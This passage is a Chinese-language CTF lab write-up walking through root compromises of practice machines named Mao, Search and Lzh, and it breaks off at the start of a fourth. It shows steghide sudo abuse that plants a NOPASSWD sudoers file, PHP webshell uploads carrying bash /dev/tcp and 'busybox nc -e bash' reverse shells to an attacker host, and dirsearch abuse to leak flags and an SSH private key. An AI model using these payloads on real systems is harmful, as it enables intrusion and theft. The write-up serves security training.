_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin systemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin systemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin systemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin messagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin sshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin lingmj:x:1000:1000:,,,:\/home\/lingmj:\/bin\/bash oneoneone:x:1001:1001:,,,:\/home\/oneoneone:\/bin\/bash todd:x:1002:1002:,,,:\/home\/todd:\/bin\/bash <\/pre>\n\n\n\n
\u4e8e\u662f\u5c31\u5f97\u4e09\u4e2a\u7528\u6237lingmj 1001 todd<\/p>\n\n\n\n
\u901a\u8fc7\u7206\u7834\u83b7\u5f97lingmj\u7684\u5bc6\u7801\u4e3ababyface<\/p>\n\n\n\n
ssh lingmj@10.247.102.83<\/pre>\n\n\n\n
lingmj@Mao:~$ <\/pre>\n\n\n\n
root<\/h3>\n\n\n\n
lingmj@Mao:\/$ sudo -l
Matching Defaults entries for lingmj on Mao:
    env_reset, mail_badpass,
    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin
\u200b
User lingmj may run the following commands on Mao:
    (ALL) NOPASSWD: \/usr\/bin\/steghide
lingmj@Mao:\/$ <\/pre>\n\n\n\n
\u4e4b\u524d\u5b66\u8fc7misc\u7684\u90fd\u77e5\u9053\u8fd9\u4e2a\u662f\u9690\u5199\u5de5\u5177\uff0c\u53ef\u4ee5\u53bb\u6587\u4ef6\u5408\u5728\u4e00\u8d77 \u8fd9\u91cc\u53c2\u8003q\u7fa4wp\u4e00\u5171\u67095\u4e2a\u65b9\u6cd5<\/p>\n\n\n\n
1<\/h4>\n\n\n\n
\u76f4\u63a5\u5305\u542broot.txt<\/p>\n\n\n\n
\u9996\u5148\u4f7f\u7528py\u6253\u5f00\u7aef\u53e3\u53bb\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b\uff0c\u7136\u540e\u4e0a\u4f20\u4e00\u4e2a\u56fe\u7247<\/p>\n\n\n\n
kali\u672c\u5730<\/p>\n\n\n\n
python3 -m http.server 8000                        
Serving HTTP on 0.0.0.0 port 8000 (http:\/\/0.0.0.0:8000\/) ...
10.247.102.83 - - [08\/Dec\/2025 23:18:37] \"GET \/A033.jpg HTTP\/1.1\" 200 -
----------------------------------------<\/pre>\n\n\n\n
shell<\/p>\n\n\n\n
lingmj@Mao:\/$ cd \/tmp
lingmj@Mao:\/tmp$ busybox wget http:\/\/10.247.102.219:8000\/A033.jpg
Connecting to 10.247.102.219:8000 (10.247.102.219:8000)
A033.jpg             100% |*****************************| 1604k  0:00:00 ETA
lingmj@Mao:\/tmp$ <\/pre>\n\n\n\n
lingmj@Mao:\/tmp$ sudo \/usr\/bin\/steghide embed -ef \/root\/root.txt -cf .\/1.jpg
Enter passphrase: 
Re-Enter passphrase: 
embedding \"\/root\/root.txt\" in \".\/1.jpg\"... done
lingmj@Mao:\/tmp$ \/usr\/bin\/steghide extract -sf .\/1.jpg
Enter passphrase: 
wrote extracted data to \"root.txt\".
lingmj@Mao:\/tmp$ ls
1.jpg
A033.jpg
root.txt
systemd-private-72a297aad5464f55b8ddd654e80c77f5-apache2.service-YKV5Xf
systemd-private-72a297aad5464f55b8ddd654e80c77f5-systemd-logind.service-6NtfCg
systemd-private-72a297aad5464f55b8ddd654e80c77f5-systemd-timesyncd.service-e9oD1f
lingmj@Mao:\/tmp$ cat root.txt
flag{root-5ad6f10629504ec51038b8c14a1fb9c6}
lingmj@Mao:\/tmp$ 
\u62ff\u4e0broot<\/pre>\n\n\n\n
2<\/h4>\n\n\n\n
\u4e3alingmj\u8d4b\u4e88\u65e0\u5bc6\u7801\u6267\u884c\u5b8c\u6574sudo\u7684\u6743\u9650(\u8fd9\u4e2a\u65b9\u6848\u662f\u8001\u5927\u63d0\u4f9b\u7684)<\/p>\n\n\n\n
\u521b\u5efa\u4e00\u4e2a\u6076\u610f\u7684sudoers\u6587\u4ef6\uff0c\u8fd9\u4e2a\u5185\u5bb9\u662f\u8d4b\u4e88lingmj\u65e0\u5bc6\u7801\u6267\u884c\u6240\u6709sudo\u547d\u4ee4\u7684\u6743\u9650<\/p>\n\n\n\n
echo 'lingmj ALL=(ALL:ALL) NOPASSWD:ALL' > a<\/pre>\n\n\n\n
\u901a\u8fc7\u9690\u5199\uff0c\u653e\u5230\/etc\/sudoers.d\u7279\u6743\u76ee\u5f55\u4e0b<\/p>\n\n\n\n
lingmj@Mao:\/tmp$ echo 'lingmj ALL=(ALL:ALL) NOPASSWD:ALL' > a
lingmj@Mao:\/tmp$ ls
1.jpg
a
A033.jpg
root.txt
systemd-private-72a297aad5464f55b8ddd654e80c77f5-apache2.service-YKV5Xf
systemd-private-72a297aad5464f55b8ddd654e80c77f5-systemd-logind.service-6NtfCg
systemd-private-72a297aad5464f55b8ddd654e80c77f5-systemd-timesyncd.service-e9oD1f
lingmj@Mao:\/tmp$ steghide embed -cf 1.jpg -ef a
Enter passphrase: 
Re-Enter passphrase: 
embedding \"a\" in \"1.jpg\"... done
lingmj@Mao:\/tmp$ cd \/etc\/sudoers.d
lingmj@Mao:\/etc\/sudoers.d$ \/etc\/sudoers.d$ ls -al
-bash: \/etc\/sudoers.d$: No such file or directory
lingmj@Mao:\/etc\/sudoers.d$ ls -al
total 12
drwxr-xr-x  2 root root 4096 Apr  4  2025 .
drwxr-xr-x 82 root root 4096 Dec  8 09:52 ..
-r--r-----  1 root root  958 Jan 14  2023 README
lingmj@Mao:\/etc\/sudoers.d$ sudo steghide extract -sf \/tmp\/1.jpg
Enter passphrase: 
wrote extracted data to \"a\".
lingmj@Mao:\/etc\/sudoers.d$ ls -al
total 16
drwxr-xr-x  2 root root 4096 Dec  8 10:36 .
drwxr-xr-x 82 root root 4096 Dec  8 09:52 ..
-rw-r--r--  1 root root   34 Dec  8 10:36 a
-r--r-----  1 root root  958 Jan 14  2023 README
lingmj@Mao:\/etc\/sudoers.d$ cat a
lingmj ALL=(ALL:ALL) NOPASSWD:ALL
lingmj@Mao:\/etc\/sudoers.d$ sudo -l
Matching Defaults entries for lingmj on Mao:
    env_reset, mail_badpass,
    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin
\u200b
User lingmj may run the following commands on Mao:
    (ALL) NOPASSWD: \/usr\/bin\/steghide
    (ALL : ALL) NOPASSWD: ALL
lingmj@Mao:\/etc\/sudoers.d$ id
uid=1000(lingmj) gid=1000(lingmj) groups=1000(lingmj)
lingmj@Mao:\/etc\/sudoers.d$ sudo -i
root@Mao:~# id
uid=0(root) gid=0(root) groups=0(root)<\/pre>\n\n\n\n
    \n
  1. lingmj@Mao:~$ steghide embed -cf 1.jpg -ef a<\/code>\u4f7f\u7528 steghide \u5de5\u5177\u5c06\u6587\u4ef6a<\/code>\uff08\u5f85\u9690\u85cf\u7684\u6587\u4ef6\uff09\u5d4c\u5165\u5230\u8f7d\u4f53\u56fe\u72471.jpg<\/code>\u4e2d\uff0c\u6267\u884c\u9690\u5199\u64cd\u4f5c\u3002<\/li>\n\n\n\n
  2. Enter passphrase:<\/code>\u63d0\u793a\u8f93\u5165\u5bc6\u7801\uff08\u7528\u4e8e\u52a0\u5bc6\u9690\u85cf\u7684\u6587\u4ef6a<\/code>\uff0c\u540e\u7eed\u63d0\u53d6\u65f6\u9700\u8f93\u5165\u76f8\u540c\u5bc6\u7801\uff09\u3002<\/li>\n\n\n\n
  3. Re-Enter passphrase:<\/code>\u518d\u6b21\u8f93\u5165\u5bc6\u7801\u786e\u8ba4\uff08\u786e\u4fdd\u4e24\u6b21\u8f93\u5165\u4e00\u81f4\uff09\u3002<\/li>\n\n\n\n
  4. embedding \"a\" in \"1.jpg\"... done<\/code>\u64cd\u4f5c\u5b8c\u6210\u63d0\u793a\uff1a\u6587\u4ef6a<\/code>\u5df2\u6210\u529f\u5d4c\u5165\u52301.jpg<\/code>\u4e2d\u3002<\/li>\n\n\n\n
  5. lingmj@Mao:~$ cd \/etc\/sudoers.d<\/code>\u5207\u6362\u5230\/etc\/sudoers.d<\/code>\u76ee\u5f55\uff08\u8be5\u76ee\u5f55\u7528\u4e8e\u5b58\u653e sudo \u6743\u9650\u914d\u7f6e\u6587\u4ef6\uff0c\u53ea\u6709 root \u7528\u6237\u6709\u5199\u5165\u6743\u9650\uff09\u3002<\/li>\n\n\n\n
  6. lingmj@Mao:\/etc\/sudoers.d$ ls -al<\/code>\u5217\u51fa\u5f53\u524d\u76ee\u5f55\u4e0b\u7684\u6240\u6709\u6587\u4ef6\uff08\u5305\u62ec\u9690\u85cf\u6587\u4ef6\uff09\u53ca\u8be6\u7ec6\u6743\u9650\u4fe1\u606f\uff0c\u6b64\u65f6\u76ee\u5f55\u4e2d\u53ea\u6709README<\/code>\u6587\u4ef6\u3002<\/li>\n\n\n\n
  7. lingmj@Mao:\/etc\/sudoers.d$ sudo steghide extract -sf ~\/1.jpg<\/code>\u4f7f\u7528 root \u6743\u9650\uff08sudo<\/code>\uff09\u4ece~\/1.jpg<\/code>\uff08\u4e4b\u524d\u5d4c\u5165\u4e86\u6587\u4ef6a<\/code>\u7684\u56fe\u7247\uff09\u4e2d\u63d0\u53d6\u9690\u85cf\u7684\u6587\u4ef6\uff0c-sf<\/code>\u6307\u5b9a\u8f7d\u4f53\u6587\u4ef6\u8def\u5f84\u3002<\/li>\n\n\n\n
  8. Enter passphrase:<\/code>\u63d0\u793a\u8f93\u5165\u5d4c\u5165\u65f6\u8bbe\u7f6e\u7684\u5bc6\u7801\uff08\u7528\u4e8e\u89e3\u5bc6\u5e76\u63d0\u53d6\u6587\u4ef6a<\/code>\uff09\u3002<\/li>\n\n\n\n
  9. wrote extracted data to \"a\".<\/code>\u63d0\u53d6\u5b8c\u6210\u63d0\u793a\uff1a\u9690\u85cf\u7684\u6587\u4ef6a<\/code>\u5df2\u6210\u529f\u63d0\u53d6\u5230\u5f53\u524d\u76ee\u5f55\uff08\/etc\/sudoers.d<\/code>\uff09\u3002<\/li>\n\n\n\n
  10. lingmj@Mao:\/etc\/sudoers.d$ ls -al<\/code>\u518d\u6b21\u67e5\u770b\u76ee\u5f55\u6587\u4ef6\uff0c\u6b64\u65f6\u65b0\u589e\u4e86\u63d0\u53d6\u51fa\u7684a<\/code>\u6587\u4ef6\uff08\u6743\u9650\u4e3a-rw-r--r--<\/code>\uff0c\u7531 root \u521b\u5efa\uff09\u3002<\/li>\n\n\n\n
  11. lingmj@Mao:\/etc\/sudoers.d$ cat a<\/code>\u67e5\u770b\u6587\u4ef6a<\/code>\u7684\u5185\u5bb9\uff0c\u663e\u793a\u4e3asudo<\/code>\u6743\u9650\u914d\u7f6e\u89c4\u5219\uff1a\u5141\u8bb8\u7528\u6237lingmj<\/code>\u65e0\u9700\u5bc6\u7801\u6267\u884c\u6240\u6709\u547d\u4ee4\u3002<\/li>\n\n\n\n
  12. lingmj@Mao:\/etc\/sudoers.d$ sudo -l<\/code>\u9a8c\u8bc1\u5f53\u524d\u7528\u6237lingmj<\/code>\u7684sudo<\/code>\u6743\u9650\uff0c\u8f93\u51fa\u663e\u793a\u5176\u88ab\u5141\u8bb8\u65e0\u9700\u5bc6\u7801\u4f7f\u7528\/usr\/bin\/steghide<\/code>\u547d\u4ee4\uff08\u7b26\u5408\u6587\u4ef6a<\/code>\u4e2d\u7684\u914d\u7f6e\uff09\u3002<\/li>\n<\/ol>\n\n\n\n
    \u6574\u4e2a\u6d41\u7a0b\u7684\u6838\u5fc3\u662f\uff1a\u901a\u8fc7\u9690\u5199\u672f\u5c06sudo<\/code>\u6743\u9650\u914d\u7f6e\u6587\u4ef6a<\/code>\u9690\u85cf\u5728\u56fe\u7247\u4e2d\uff0c\u518d\u63d0\u53d6\u5230\/etc\/sudoers.d<\/code>\u76ee\u5f55\uff0c\u5b9e\u73b0\u5bf9\u7528\u6237\u6743\u9650\u7684\u914d\u7f6e\u3002<\/p>\n\n\n\n
    3<\/h4>\n\n\n\n
    111\u5927\u4f6c\u7684<\/p>\n\n\n\n
    \u4e4b\u540e\u518d\u8865\u5427\uff0c\u5509<\/p>\n\n\n\n
    \u9776\u673a\u590d\u73b0-Search<\/h2>\n\n\n\n
    user<\/h3>\n\n\n\n
    \u6253\u5f00\u9776\u673a \u4e09\u4ef6\u5957 nmap,dirsearch gobuster dir<\/p>\n\n\n\n
    nmap\u51fa\u676522\u548c80\u7aef\u53e3<\/p>\n\n\n\n
    gobuster dir -u http:\/\/10.247.102.224 -w \/usr\/share\/wordlists\/dirb\/common.txt
    ===============================================================
    Gobuster v3.8
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:                     http:\/\/10.247.102.224
    [+] Method:                  GET
    [+] Threads:                 10
    [+] Wordlist:                \/usr\/share\/wordlists\/dirb\/common.txt
    [+] Negative Status codes:   404
    [+] User Agent:              gobuster\/3.8
    [+] Timeout:                 10s
    ===============================================================
    Starting gobuster in directory enumeration mode
    ===============================================================
    \/.hta                 (Status: 403) [Size: 279]
    \/.htaccess            (Status: 403) [Size: 279]
    \/.htpasswd            (Status: 403) [Size: 279]
    \/admin                (Status: 301) [Size: 316] [--> http:\/\/10.247.102.224\/admin\/]                                                                        
    \/api                  (Status: 301) [Size: 314] [--> http:\/\/10.247.102.224\/api\/]                                                                          
    \/assets               (Status: 301) [Size: 317] [--> http:\/\/10.247.102.224\/assets\/]                                                                       
    \/favicon.ico          (Status: 200) [Size: 4286]
    \/index                (Status: 200) [Size: 80683]
    \/index.php            (Status: 200) [Size: 80676]
    \/Java                 (Status: 200) [Size: 64546]
    \/javascript           (Status: 200) [Size: 62969]
    \/java                 (Status: 200) [Size: 64546]
    \/php                  (Status: 200) [Size: 58255]
    \/PHP                  (Status: 200) [Size: 58255]
    \/robots.txt           (Status: 200) [Size: 25]
    \/server-status        (Status: 403) [Size: 279]
    \/static               (Status: 301) [Size: 317] [--> http:\/\/10.247.102.224\/static\/]                                                                       
    \/uploads              (Status: 301) [Size: 318] [--> http:\/\/10.247.102.224\/uploads\/]                                                                      
    Progress: 4613 \/ 4613 (100.00%)
    ===============================================================
    Finished<\/pre>\n\n\n\n
    dirsearch\u5c31\u4e0d\u5c55\u793a\u4e86<\/p>\n\n\n\n
    \u53d1\u73b0setup.txt\u91cc\u9762\u5b58\u5728\u8d26\u53f7\u548c\u5bc6\u7801\uff0c\u767b\u5f55\u4e4b\u540e\u662ffeehi cms\uff0c\u4fe1\u606f\u641c\u96c6\u4e00\u4e0b\u53d1\u73b0\u53ef\u80fd\u5b58\u5728\u7684\u6f0f\u6d1e<\/p>\n\n\n\n
    \u53d1\u73b0\u5728\u5e7f\u544a\u7ba1\u7406\u91cc\u9762\u5b58\u5728\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\uff0c\u76f4\u63a5\u63d2\u5165webshell\u901a\u8fc7\u53cd\u5f39shell\u8fdb\u5165\u5185\u7f51<\/p>\n\n\n\n
    ------WebKitFormBoundaryAqHilH6RnHBZLCys

    Content-Disposition: form-data; name=\"AdForm[ad]\"; filename=\"A033.php\"

    Content-Type: image\/jpeg
    <?php
    exec(\"\/bin\/bash -c'bash -i >& \/dev\/tcp\/kali\/7777 0>&1'\");?><\/pre>\n\n\n\n
    www-data@Search:\/home$ sudo -l
    sudo -l
    Matching Defaults entries for www-data on Search:
        env_reset, mail_badpass,
        secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin

    User www-data may run the following commands on Search:
        (7r1umphk) NOPASSWD: \/usr\/local\/bin\/dirsearch
    www-data@Search:\/home$ <\/pre>\n\n\n\n
    \u53cd\u5f39\u6210\u529f<\/p>\n\n\n\n
    \u7136\u540esudo -l \u770b\u4e00\u4e0b\u600e\u4e48\u53bb\u63d0\u6743\uff0c\u53d1\u73b0\u662fdirsearch\u8fd9\u4e2a\u626b\u63cf\u5de5\u5177<\/p>\n\n\n\n
    ww-data@Search:\/tmp$ sudo -u 7r1umphk dirsearch -u http:\/\/127.0.0.1
    sudo -u 7r1umphk dirsearch -u http:\/\/127.0.0.1

      _|. _ _  _  _  _ _|_    v0.4.3.post1
     (_||| _) (\/_(_|| (_| )

    Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
    Wordlist size: 11460

    Output File: \/tmp\/reports\/http_127.0.0.1\/_25-12-09_08-44-56.txt

    Target: http:\/\/127.0.0.1\/

    [08:44:56] Starting: 
    [                    ]  0%
    \u6ca1\u5565\u7279\u522b\u7684<\/pre>\n\n\n\n
    \/usr\/local\/bin\/dirsearch -h
    Usage: dirsearch [-u|--url] target [-e|--extensions] extensions [options]

    Options:
      --version             show program's version number and exit
      -h, --help            show this help message and exit

      Mandatory:
        -u URL, --url=URL   Target URL(s), can use multiple flags
        -l PATH, --url-file=PATH
                            URL list file
        --stdin             Read URL(s) from STDIN
        --cidr=CIDR         Target CIDR
        --raw=PATH          Load raw HTTP request from file (use `--scheme` flag
                            to set the scheme)
        -s SESSION_FILE, --session=SESSION_FILE
                            Session file
        --config=PATH       Full path to config file, see 'config.ini' for example
                            (Default: config.ini)

      Dictionary Settings:
        -w WORDLISTS, --wordlists=WORDLISTS
                            Customize wordlists (separated by commas)
        -e EXTENSIONS, --extensions=EXTENSIONS
                            Extension list separated by commas (e.g. php,asp)
        -f, --force-extensions
                            Add extensions to the end of every wordlist entry. By
                            default dirsearch only replaces the %EXT% keyword with
                            extensions
        -O, --overwrite-extensions
                            Overwrite other extensions in the wordlist with your
                            extensions (selected via `-e`)
        --exclude-extensions=EXTENSIONS
                            Exclude extension list separated by commas (e.g.
                            asp,jsp)
        --remove-extensions
                            Remove extensions in all paths (e.g. admin.php ->
                            admin)
        --prefixes=PREFIXES
                            Add custom prefixes to all wordlist entries (separated
                            by commas)
        --suffixes=SUFFIXES
                            Add custom suffixes to all wordlist entries, ignore
                            directories (separated by commas)
        -U, --uppercase     Uppercase wordlist
        -L, --lowercase     Lowercase wordlist
        -C, --capital       Capital wordlist

      General Settings:
        -t THREADS, --threads=THREADS
                            Number of threads
        -r, --recursive     Brute-force recursively
        --deep-recursive    Perform recursive scan on every directory depth (e.g.
                            api\/users -> api\/)
        --force-recursive   Do recursive brute-force for every found path, not
                            only directories
        -R DEPTH, --max-recursion-depth=DEPTH
                            Maximum recursion depth
        --recursion-status=CODES
                            Valid status codes to perform recursive scan, support
                            ranges (separated by commas)
        --subdirs=SUBDIRS   Scan sub-directories of the given URL[s] (separated by
                            commas)
        --exclude-subdirs=SUBDIRS
                            Exclude the following subdirectories during recursive
                            scan (separated by commas)
        -i CODES, --include-status=CODES
                            Include status codes, separated by commas, support
                            ranges (e.g. 200,300-399)
        -x CODES, --exclude-status=CODES
                            Exclude status codes, separated by commas, support
                            ranges (e.g. 301,500-599)
        --exclude-sizes=SIZES
                            Exclude responses by sizes, separated by commas (e.g.
                            0B,4KB)
        --exclude-text=TEXTS
                            Exclude responses by text, can use multiple flags
        --exclude-regex=REGEX
                            Exclude responses by regular expression
        --exclude-redirect=STRING
                            Exclude responses if this regex (or text) matches
                            redirect URL (e.g. '\/index.html')
        --exclude-response=PATH
                            Exclude responses similar to response of this page,
                            path as input (e.g. 404.html)
        --skip-on-status=CODES
                            Skip target whenever hit one of these status codes,
                            separated by commas, support ranges
        --min-response-size=LENGTH
                            Minimum response length
        --max-response-size=LENGTH
                            Maximum response length
        --max-time=SECONDS  Maximum runtime for the scan
        --exit-on-error     Exit whenever an error occurs

      Request Settings:
        -m METHOD, --http-method=METHOD
                            HTTP method (default: GET)
        -d DATA, --data=DATA
                            HTTP request data
        --data-file=PATH    File contains HTTP request data
        -H HEADERS, --header=HEADERS
                            HTTP request header, can use multiple flags
        --header-file=PATH  File contains HTTP request headers
        -F, --follow-redirects
                            Follow HTTP redirects
        --random-agent      Choose a random User-Agent for each request
        --auth=CREDENTIAL   Authentication credential (e.g. user:password or
                            bearer token)
        --auth-type=TYPE    Authentication type (basic, digest, bearer, ntlm, jwt,
                            oauth2)
        --cert-file=PATH    File contains client-side certificate
        --key-file=PATH     File contains client-side certificate private key
                            (unencrypted)
        --user-agent=USER_AGENT
        --cookie=COOKIE     

      Connection Settings:
        --timeout=TIMEOUT   Connection timeout
        --delay=DELAY       Delay between requests
        --proxy=PROXY       Proxy URL (HTTP\/SOCKS), can use multiple flags
        --proxy-file=PATH   File contains proxy servers
        --proxy-auth=CREDENTIAL
                            Proxy authentication credential
        --replay-proxy=PROXY
                            Proxy to replay with found paths
        --tor               Use Tor network as proxy
        --scheme=SCHEME     Scheme for raw request or if there is no scheme in the
                            URL (Default: auto-detect)
        --max-rate=RATE     Max requests per second
        --retries=RETRIES   Number of retries for failed requests
        --ip=IP             Server IP address

      Advanced Settings:
        --crawl             Crawl for new paths in responses

      View Settings:
        --full-url          Full URLs in the output (enabled automatically in
                            quiet mode)
        --redirects-history
                            Show redirects history
        --no-color          No colored output
        -q, --quiet-mode    Quiet mode

      Output Settings:
        -o PATH, --output=PATH
                            Output file
        --format=FORMAT     Report format (Available: simple, plain, json, xml,
                            md, csv, html, sqlite)
        --log=PATH          Log file
    www-data@Search:\/tmp$ <\/pre>\n\n\n\n
    \u67e5\u770b\u5e2e\u52a9<\/p>\n\n\n\n
    --log=PATH \u662f\u547d\u4ee4\u884c\u5de5\u5177\u4e2d\u5e38\u89c1\u7684\u53c2\u6570\uff0c\u4f5c\u7528\u662f\u5c06\u5de5\u5177\u8fd0\u884c\u8fc7\u7a0b\u4e2d\u7684\u65e5\u5fd7\u4fe1\u606f\uff08\u64cd\u4f5c\u8bb0\u5f55\u3001\u72b6\u6001\u3001\u9519\u8bef\u7b49\uff09\u4fdd\u5b58\u5230\u6307\u5b9a\u8def\u5f84\uff08PATH\uff09\u7684\u6587\u4ef6\u4e2d<\/pre>\n\n\n\n
    sudo -u 7r1umphk dirsearch -u http:\/\/127.0.0.1 -w \/home\/7r1umphk\/user.txt --log=\/tmp\/1.txt<\/pre>\n\n\n\n
    \u5148\u5229\u7528\u5176\u9ad8\u6743\u9650\u77ed\u6682\u7684\u5207\u6362\u7528\u6237\uff0c\u7136\u540e\u5229\u7528 wordlist \u53c2\u6570\u4f20\u5165\u6587\u4ef6\u8def\u5f84\uff0c\u89e6\u53d1\u62a5\u9519\u6cc4\u9732\u6587\u4ef6\u5185\u5bb9\uff0c\u901a\u8fc7\u62a5\u9519\u83b7\u5f97user.txt\u91cc\u9762\u7684\u5185\u5bb9<\/p>\n\n\n\n
    2025-12-09 08:55:13,129 [INFO] \"GET http:\/\/127.0.0.1\/flag{user-681db772f6844d4c84da083c3d280954}\" 404 - 33003B
    www-data@Search:\/tmp$ \u62ff\u4e0buser<\/pre>\n\n\n\n
    \u53ef\u4ee5\u53bb\u62ffuser.txt\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u53bb\u62ff\u4e0b\u5bc6\u94a5\uff0c\u5e94\u8be5\u662f\u53ef\u4ee5\u7684<\/p>\n\n\n\n
    sudo -u 7r1umphk \/usr\/local\/bin\/dirsearch -l \/home\/7r1umphk\/.ssh\/id_ed25519<\/pre>\n\n\n\n
    root<\/h3>\n\n\n\n
    \u9776\u673a\u590d\u73b0-lzh<\/h2>\n\n\n\n
    user<\/h3>\n\n\n\n
    \u6253\u5f00\u9776\u673anamp\u626b\u63cf\uff0c\u7136\u540edir\u6216\u8005gobuster dir\u53bb\u626b\u63cf<\/p>\n\n\n\n
    \u7aef\u53e3\u662f22\u548c80
    \u540e\u53f0\u51fa\u6765\u662fbackup.zip<\/pre>\n\n\n\n
    \u53d1\u73b0\u51fa\u6765\u4e00\u4e2a\u662f\u5173\u4e8e\u8fd9\u4e2a\u7684mozilo\u6846\u67b6<\/p>\n\n\n\n
    \u7136\u540e\u5c31\u641c\u4e00\u4e0b\u4ed6\u7684\u7248\u672c\u53f7\u4ee5\u53ca\u770b\u770b\u6709\u6ca1\u6709\u5386\u53f2\u6f0f\u6d1e\uff0c\u53d1\u73b0MoziloCMS 3.0 – Remote Code Execution (RCE) – PHP webapps Exploit<\/a><\/p>\n\n\n\n
    \u7b80\u5355\u6765\u8bf4\u5c31\u662f\u901a\u8fc7\u8fdb\u5165\u5185\u90e8\u53bb\u6587\u4ef6\u4e0a\u4f20\uff0c\u53bb\u6267\u884cphp\u4ee3\u7801<\/p>\n\n\n\n
    \u901a\u8fc7\u53bb\u7206\u7834\u7528\u6237user\u548c\u5bc6\u7801<\/p>\n\n\n\n
    admin\/Admin123<\/pre>\n\n\n\n
    \u7136\u540e\u5728\u6587\u4ef6\u7ba1\u7406\u91cc\u9762\u53bb\u6587\u4ef6\u4e0a\u4f20\uff0c\u4e0d\u8fc7\u4ed6\u521a\u5f00\u59cb\u662f\u4e0d\u4f1a\u89e3\u6790php\u6587\u4ef6\uff0c\u9700\u8981\u5148\u53bb\u4f20txt\u6587\u4ef6\uff0c\u7136\u540e\u53bb\u91cd\u547d\u540d\u5c31\u53ef\u4ee5\u4e86<\/p>\n\n\n\n
    <?php
    exec(\"busybox nc 10.247.102.219 4444 -e bash\")?><\/pre>\n\n\n\n
    \u6210\u529f\u53cd\u5f39shell\u6210\u529f\uff0c\u7136\u540e\u53bbhome\u4e0b\u9762\u53d1\u73b0welcome\u7528\u6237<\/p>\n\n\n\n
    \u5728\u52aa\u529b\u54e5wp\u4e2d\u63d0\u5230\u8d26\u53f7\u5bc6\u7801\u901a\u5e38\u53ef\u80fd\u5b58\u5728\u4e8e\u914d\u7f6e\u6587\u4ef6\u91cc\u9762\uff0c\u6216\u8005\u76f4\u63a5\u6572\u547d\u4ee4\u67e5\u627e\u5173\u4e8e\u7528\u6237\u7684\u5185\u5bb9<\/pre>\n\n\n\n
    www-data@Lzh:\/var\/www\/html\/mozilo\/admin$ grep -rin \"welcome\" --include=\"*.php\" .\/
    <ilo\/admin$ grep -rin \"welcome\" --include=\"*.php\" .\/
    .\/config.php:107:    \/\/ welcome:3e73d572ba005bb3c02107b2e2fc16f8<\/pre>\n\n\n\n
    \u6210\u529f\u8fde\u63a5<\/pre>\n\n\n\n
    root<\/h3>\n\n\n\n
    sudo\u548cfind \/ -perm \/4000 -type f -exec ls -ld {} \\; 2>\/dev\/null \u53d1\u73b0\u6ca1\u6709sudo<\/p>\n\n\n\n
    welcome@Lzh:~$ ls -al
    total 28
    drwx------ 2 welcome welcome 4096 Apr 12  2025 .
    drwxr-xr-x 3 root    root    4096 Apr 11  2025 ..
    lrwxrwxrwx 1 root    root       9 Apr 11  2025 .bash_history -> \/dev\/null
    -rw-r--r-- 1 welcome welcome  220 Apr 11  2025 .bash_logout
    -rw-r--r-- 1 welcome welcome 3526 Apr 11  2025 .bashrc
    -rw-r--r-- 1 root    root    2590 Apr 12  2025 id_rsa
    -rw-r--r-- 1 welcome welcome  807 Apr 11  2025 .profile
    -rw-r--r-- 1 welcome welcome   44 Apr 12  2025 user.txt
    lrwxrwxrwx 1 root    root       9 Apr 12  2025 .viminfo -> \/dev\/null<\/pre>\n\n\n\n
    \u53d1\u73b0\u5b58\u5728\u4e00\u4e2arsa\u6587\u4ef6\uff0c\u76f4\u63a5\u53bb\u8fde\u63a5<\/p>\n\n\n\n
    welcome@Lzh:~$ ssh -i id_rsa root@localhost
    The authenticity of host 'localhost (::1)' can't be established.
    ECDSA key fingerprint is SHA256:IV6iZTL6D\/\/1Ojh0d8XoSMepPgjyUfV\/FpQmf3q35Hg.
    Are you sure you want to continue connecting (yes\/no\/[fingerprint])? yes
    Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
    Load key \"id_rsa\": invalid format
    \u683c\u5f0f\u9519\u8bef<\/pre>\n\n\n\n
    welcome@Lzh:~$ cat id*
    -----BEGIN OPENSSH PRIVATE KEY-----
    ???lbnNz<\/pre>\n\n\n\n
    \u53d1\u73b0\u524d\u4e09\u4f4d\u662f\uff1f\uff0c\u7b80\u5355\u4fe1\u606f\u641c\u96c6\u4e00\u4e0b\uff0c\u95eeai\u8981\u53ef\u4ee5\u51fa\u6765\uff0c\u53d1\u73b0\u524d\u4e09\u4f4d\u662fb3B\uff0c\u7136\u540e\u628a\u4ed6cp\u5230\/tmp\u91cc\u9762\uff0c\u7136\u540e\u6dfb\u52a0600\u6743\u9650\uff0cvim\u6539\u4e0b<\/p>\n\n\n\n
    \u7136\u540e\u53bb\u672c\u5730\u6d4b\u8bd5\u8fde\u63a5ssh -i \/tmp\/id_rsa root@localhost<\/p>\n\n\n\n
    \u62ff\u4e0broot<\/p>\n\n\n\n
    welcome@Lzh:\/tmp$ ssh root@localhost -i \/tmp\/id_rsa
    Linux Lzh 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

    The programs included with the Debian GNU\/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in \/usr\/share\/doc\/*\/copyright.

    Debian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Sat Apr 12 23:17:27 2025 from 192.168.3.94
    root@Lzh:~# id
    uid=0(root) gid=0(root) groups=0(root)<\/pre>\n\n\n\n
    7r1umph<\/h2>\n\n\n\n
    \u6253\u5f00\u9776\u673a\uff0c\u4f9d\u7136\u4e09\u4ef6\u5957nmap,dirsearch,dir\u626b\u63cf<\/p>\n\n\n\n
